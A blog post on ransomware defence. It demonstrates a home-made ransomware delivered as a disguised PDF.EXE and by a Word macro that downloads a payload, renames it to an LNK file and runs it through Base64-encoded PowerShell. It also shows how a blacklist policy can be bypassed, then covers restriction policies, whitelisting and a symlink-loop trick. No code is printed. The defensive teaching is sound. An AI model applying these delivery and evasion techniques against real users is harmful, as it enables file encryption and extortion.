In this blog post, we are going to be discussing a pretty popular subject: ransomware protection. Before we start the article properly, let me tell you a little story that’s behind it.
This happened at a customer’s site. Once worked for this customer and knew a couple of people working in this company. He called asking if I knew a lady called Veronica and I answered in the positive. Truth be told, Veronica is a very social lady and literally clicks on everything that moves.
It so happened that she got an email, which is the number vehicle for ransomware, with a message saying she should click on a link that will take her to Dropbox if she wants to listen to a voice message. But seriously, who really sends a voice message through Dropbox? Well, Veronica being the social lady she was, wanted to listen to the voice message and she clicked on the link. She eventually got the ransomware which was a variant of cryptolocker. She got not only her own disk drive encrypted, but also the file server which she was using in managing documents for traders. So quite a sad story especially, because I got this message in the morning when everybody came to work.
Once we understand them, we will be able to protect ourselves. Protection is not easy, because unfortunately it really depends, on our budget. Even though your company doesn’t have a high budget to spend on prevention technologies, there are still a couple of effective things you can do to protect the organization.
How Ransomware Works
Our team wrote one, obviously not to earn money, but to teach our customers how that kind of piece of code works. Later on, I will show you a couple of interesting techniques which you can use in your company in order to prevent it. Of course, we will also mention the solutions that are, globally on the enterprise level, working. I want you to understand at the end of this post, how and what kind of techniques ransomware uses. Let’s dive in.
Above there is an image of a typical phishing email from someone at whitehouse.gov. This is where we will start our discussion about ransomware. The downloaded document from the email looks like a transaction receipt for $100. Let’s get some information about what kind of transaction receipt this is by going to the Downloads folder on Windows.
Above there is what the user sees in the Downloads folder. Of course, for someone who works in the IT industry, it will be easy to spot this type of document as an application. However, since Windows hides extensions by default, a regular user literally has no chance of knowing if this is an actual PDF document or an application.
Above is the ransomware we wrote just for educational purposes, and since we don’t earn any money on it, you will just see a sample. In this situation, the user’s data will be encrypted.
Above is my desktop where I’ve got some documents and a secure_textfile. Now, I’m going to open the text file up.
There’s a URL to a quiz (which you should take if you haven’t done that yet) and besides that, all you will see is plain text. That’s good, because when the user opens up the transaction receipt, for example, that’s all the information he gets. Of course, this exact text doesn’t necessarily have to appear. It all depends on the policies set up in the ransomware. If the user pays attention, he will see the ‘Run’ prompt that will come up while trying to open the PDF. However, because the user just wants to open the PDF, he will click ‘Run’. This opens up the PDF but also the ransomware.
What happened behind the scene is that this particular document got encrypted. As you can see below, it’s right now in the encrypted form. At the end, we have to pay a ransom.
This is how a ransomware gets into the enterprise. At this point, we may be wondering what went wrong over here. First of all, this one of the cases where we should definitely pay attention to the configuration of extensions in Windows. As I mentioned earlier, the extensions are hidden by default. Why don’t we, for example, make them show and teach users how to recognize malicious extensions? Of course, the process will be a little challenging but if you implement security awareness trainings, this could be interesting.
The second thing worth paying attention here, is that it is possible to execute this particular PDF.EXE just like that. That’s the point. My team and I have been talking for the past couple of years about implementing code execution prevention which we think is a crucial step for security in the enterprise. Surprisingly, I can tell you that in a lot of cases that we have seen, they didn’t even start the project. This is quite disturbing, because code execution prevention is the number one prevention for this kind of situation. We are not going to mention antiviruses here because they won’t really help here. This is because a ransomware is a piece of code that nobody really knows before it attacks.
I would like to show you a solution. Of course, in Windows, we’ve got applocker, but applocker is only available in the Enterprise Edition which for some of the companies might be just not reachable. For that, we can use third party solutions, or we can try to implement software restriction policies in a simple way. This is a pretty old solution, but when implemented well it can do a pretty good job. The general idea here is to focus on whitelisting rather than blacklisting, because we don’t want to escape anything that ransomware could potentially overuse. We will, just by default, say that we will like to deny everything, and then on the top of that we will enable certain types of cases.
Before going forward, I am going to clean up the ransomware I introduced earlier so we will be able to work with it in other cases. I am also going to decrypt the text file and switch to a different machine. On this other machine, we are going to test all possible solutions that we can implement besides the enterprise solution. We will cover the applocker solution in another post, but this post will be for everybody else that don’t have applocker available.
We’ve got software restriction policy in Windows. Before we discuss that, I’ve got something for you. There’s a tool called CryptoPrevent from the guys at Foolish IT (not a nice name, right?). The tool is worth looking at because of the interesting software restriction policy rules that they offer. If you download the tool from their website and select ‘Advanced’ > ‘Show More Options’, you will see different types of options which we can use to prevent execution from certain known locations.
These are statistically the most used locations which malware executes from. The tool is free, however, you have to pay for maintenance if you want. We have no interest in this tool, but it’s an interesting piece of code.
We are going to apply protection as provided by the tool. Let’s do that and see if in our case, our PDF.EXE file will execute or not.
As you can see, I’ve got these copies on the desktop and we will check If they’re going to execute, and if yes, under what conditions. I will apply the protection right now using the default, but pretty good settings. For example, one of the things that will be prevented is to execute executable from the user’s profile. In order to apply it, we need to restart the PC. Once the machine is restarted, we will be ready to go.
I will log on as one of the users. Let’s see if the prevention was applied. We should get a message about successful application.
Now, we can try to open transactionreceipt.PDF.EXE. Of course, it’s a PDF.EXE so you’ve got a sound and a message telling you that it is not allowed, because it’s prevented by the administrator.
That is a software restriction policy type of message that kind of makes sense. The question now is, is it possible if I rename the file from transanctionreceipt.PDF.EXE to let’s say, transanctionreceipt.EXE, to execute it? Unfortunately, I am able to execute it and that’s not good. On the other hand, it was blocked from the roaming, or appdata, user’s profile folders. Let’s find out if this is blocked.
In the rules we’ve set, we have denied any file with PDF.EXE in the name from not executing. However, if it’s just an EXE and you execute if from the desktop, you will see that it is will execute. Let’s see if the blocking works also from the user’s profile.
As you can see, I am blocked. The question is, how many levels down here are supported by the solution. I’m going to create a folder named One, and then I will try execute it again. Wow, it didn’t work. Let’s do it one more time, and let’s move it over here.
As you see, it opens. The solution is not perfect, but it is actually pretty good from the statistics perspective taking into consideration how malware usually works. If we will be writing our own ransomware right now, we will take this into consideration and we’re going to write up software that will maybe go and execute on the third level down here in the user’s profile. Of course, these solutions can be bypassed because we are blacklisting things, not whitelisting things.
This approach is OK but is there anything we can do better? Absolutely, yes. Before we move on, let’s disable the protection. To do this, you have to go into ‘Advanced Protection’ and the reboot your PC.
Now, I will show you how to configure software restriction policies, and if it makes sense. We will also leverage over here a very interesting solution where we will apply the whitelisting approach, where we will deny everything. On the top of that, we will allow certain things from folders such as Windows, Program Files, etc which are the normal locations for regular software to execute from.
We are almost ready, but we need to get to the policy, so secpol.msc. We’ve got software restriction policies here. Right-click and select new software restriction policies and security levels where we specify that we want to disallow everything and set as default.
For now, everything we try to execute gives us the sound and message notifying us that it has been blocked.
In this particular case, the software was blocked because of two interesting reasons. The first is because the software is running from the Program Files 32-bit folder, which we will discuss in a moment. The other reason is because this is a LNK file, which is actually just a shortcut. If we go into the software restriction policies node, and go to the designated file types, one of the file types blocked is the LNK file type. Let’s remove it from the list and then click Apply.
At this stage, let’s try running the LNK file again. It is still blocked because of the 32-bit software that it is. If we go to Additional rules, we have the Program Files Directory Path Rule.
I will quickly create a similar rule by copying the already existing one, hereby specifying that a program file in the x86 folder is allowed to run.
This now becomes the third rule. If we try to run the LNK file again, no message or sound will popup and the program will run fine.
We have just enabled LNK files, but is this a safe behaviour? The answer to this question is ‘not really’. Let me switch to another machine.
On this other machine, you can see there is another type of phishing email saying the user should download a transactionreceipt.doc file. You can probably guess there’s going to be some kind of macro embedded in it. I want to show you how this macro works and it’s very interesting. If we double-click on the Word document, it opens in protected view. Now, enable editing and then you get a security warning saying “In order to open this document, click enable content”. Now, if you don’t work in IT or not security conscious, you will just click on “enable content”.
In this particular macro, what I’ve got is a very interesting piece of code. Have a look.
Over here, we are downloading the encrypt.bin file and we are renaming it to an LNK file. That’s kind of strange, because how could we expect that LNK file will be something that’s going to execute. Well, that’s the whole point. Even though we could, for example, block all that executables but remember we have enabled LNKs. Therefore, in this particular case, it can be a bit dangerous for us. Let me show you. Before we do it, what is important for us is to see two things. First, this text file is still a text file so it’s not encrypted; it’s going to be encrypted. Second, I’m going to run PROCMON here. It starts monitoring pretty much immediately.
Couple of things such as Explorer.EXE, SVCHost and some others which I don’t need to monitor are running and can make a little bit of a mess. I will exclude all of those things. Let’s leave a couple of processes I could be interested in.
Now that we have this running, we can go ahead and run the macro, so: Enable Content. After enabling the macro, the document becomes encrypted. What happened now? We’ve got PROCMON to tell us what happened. This is quite interesting. I will stop the monitoring.
We can check, by folder, was is being written into all the different types of folders. Now, we need to know what is happening. I can, of course, filter this by double-clicking, and you can see below, and this is very interesting, that it was a PowerShell script that was doing something.
This is weird. If we go to the properties of the PowerShell process, and if we go to the process, we can see one of the techniques (actually my favourite) to execute the code remotely. If you are afraid that there will be a situation where all the special characters will not be processed properly, PowerShell parameter EncodedCommand is the case.
We are executing over here a Base64 code. I’m going to copy that, for now in PowerShell. At that stage, I got this little script over here, I am able to decode.
Let’s decode it using this little Base64 decoder. What we see below, is our ransomware but being written in the PowerShell.
This is something that is the future. It can be running as an user and it is allowed to run because it is PowerShell!
Mindset For Defeating Ransomware
When implementing successful prevention against ransomware, what are the three most important things we should think of?
Unfortunately, reality leaves us a little bit sad. Based on what we see during our penetration test, a lot of companies are not ready. They definitely need to start thinking about implementing these kind of solutions and I hope this little post will convince you start now.
The Geeky Part of Me
At the other end, I’ve got a little geeky option for you. What we will do is to implement something that is actually quite funny from the implementation perspective. It’s going to be a little geeky thing that can prevent ransomware a bit. Let me start the console as an administrator, and move to the user called Freddy and his desktop. I will implement something that our team was thinking about. We were thinking of any geeky option in Windows that could make ransomware not execute properly. Don’t get me wrong, it’s more like a cherry on a dessert instead of having this as a professional solution, but have a look.
I will create, over here, a folder. Let’s name it ###loop, and let’s get into it. I will create a symbolic link which I named zero. It’s going to be pointing to the loop. I will do the same, but it’s going to be just another one with the name of One. If we do dir /a/s/b you can now see that it’s looping.
The reason I used ### in the namie is because it’s from the beginning of the ASCII table, and this is quite interesting because you might be wondering, “Okay, but how long does it take for the particular ransomware to be looping here”?
First of all, if I open the transaction receipt that we know from before, the PDF opens and it takes some time. Our ransomware will not go through because It takes a long time.
If we have a look into how many levels and how many iterations we have got here, taking the maximum link length into consideration, we’ve got approximately 60 levels to jump to. That means that we’ve got 2 to the power of 60 iterations. That’s why we are naming the links with one character to make a lot of iterations, because what matters here is the amount of levels.
Effectively, when we wonder how many levels and how many folders we go per second, assuming that we’ve got 1,000 folders being read in a second, then we need 2 to the power of 50 seconds to go through the whole structure that I am displaying above. By the way, I will stop it now because the view is horrible.
Ransomware will have something to do on your computer. Sooner or later, you will notice that because of the input and output operations that are very expensive, the CPU time is definitely spent on that. This is like a little, geeky thingy that you can check out in your infrastructure if you have nothing implemented right now. Of course, this might be something that you need to test with your anti-virus and backup solutions. It might be necessary to exclude it, but this is something that you need to test by yourself.
What we have learned right now, are the different kinds of options that are important from the ransomware perspective.
I’m really curious, in your ransomware stories, if you had any situations like this or you knew someone that had situations like this, please let us know in the comments section below. I will surely respond to that. I really want organizations to stop being vulnerable to ransomware, which is such a simple solution. To prevent it, it’s also not very difficult. I’m keeping my fingers crossed for organizations to stay on the safe side. Till next week, stay safe.